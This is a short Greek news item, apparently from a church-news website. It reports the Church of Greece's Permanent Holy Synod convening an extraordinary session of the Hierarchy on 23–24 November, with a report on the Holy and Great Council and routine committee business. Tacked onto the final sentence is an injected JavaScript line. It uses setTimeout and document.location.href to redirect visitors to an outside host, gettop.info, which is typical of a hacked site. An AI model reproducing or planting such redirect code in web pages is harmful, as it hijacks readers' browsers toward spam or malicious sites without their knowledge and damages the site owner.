Έκτακτη σύγκληση της Ιεραρχίας της Ιεράς Συνόδου

0
7

 

Στις 23 και 24 Νοεμβρίου αποφασίστηκε η έκτακτη σύγκληση της Ιεραρχίας της Ιεράς Συνόδου της Εκκλησίας της Ελλάδος κατά την τρίτη συνεδρία της Διαρκούς Ιεράς Συνόδου της Εκκλησίας της Ελλάδος της 160ής Συνοδικής Περιόδου, για τον μήνα Νοέμβριο.

Στη διάρκεια των εργασιών της, ο μητροπολίτης Σερρών και Νιγρίτης Θεολόγος θα αναγνώσει την εισήγησή του με θέμα «Ενημέρωσις περί των διεξαχθεισών εργασιών της Αγίας και Μεγάλης Συνόδου της Ορθοδόξου Εκκλησίας» και θα ακολουθήσει συζήτηση επ’ αυτής.

Η ΔΙΣ, υπό την προεδρία του Αρχιεπισκόπου Αθηνών και πάσης Ελλάδος Ιερωνύμου, ασχολήθηκε επίσης με θέματα Μητροπόλεων και των Συνοδικών Επιτροπών επί των Διορθοδόξων και Διαχριστιανικών Σχέσεων, επί της Εκκλησιαστικής Εκπαιδεύσεως και Επιμορφώσεως του Εφημεριακού Κλήρου, επί του Τύπου, των Δημοσίων Σχέσεων και της Διαφωτίσεως, καθώς και επί της Κοινωνικής Προνοίας και της Ευποιίας.

Τέλος, ενέκρινε αποσπάσεις κληρικών και ασχολήθηκε με τρέχοντα υπηρεσιακά ζητήματα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here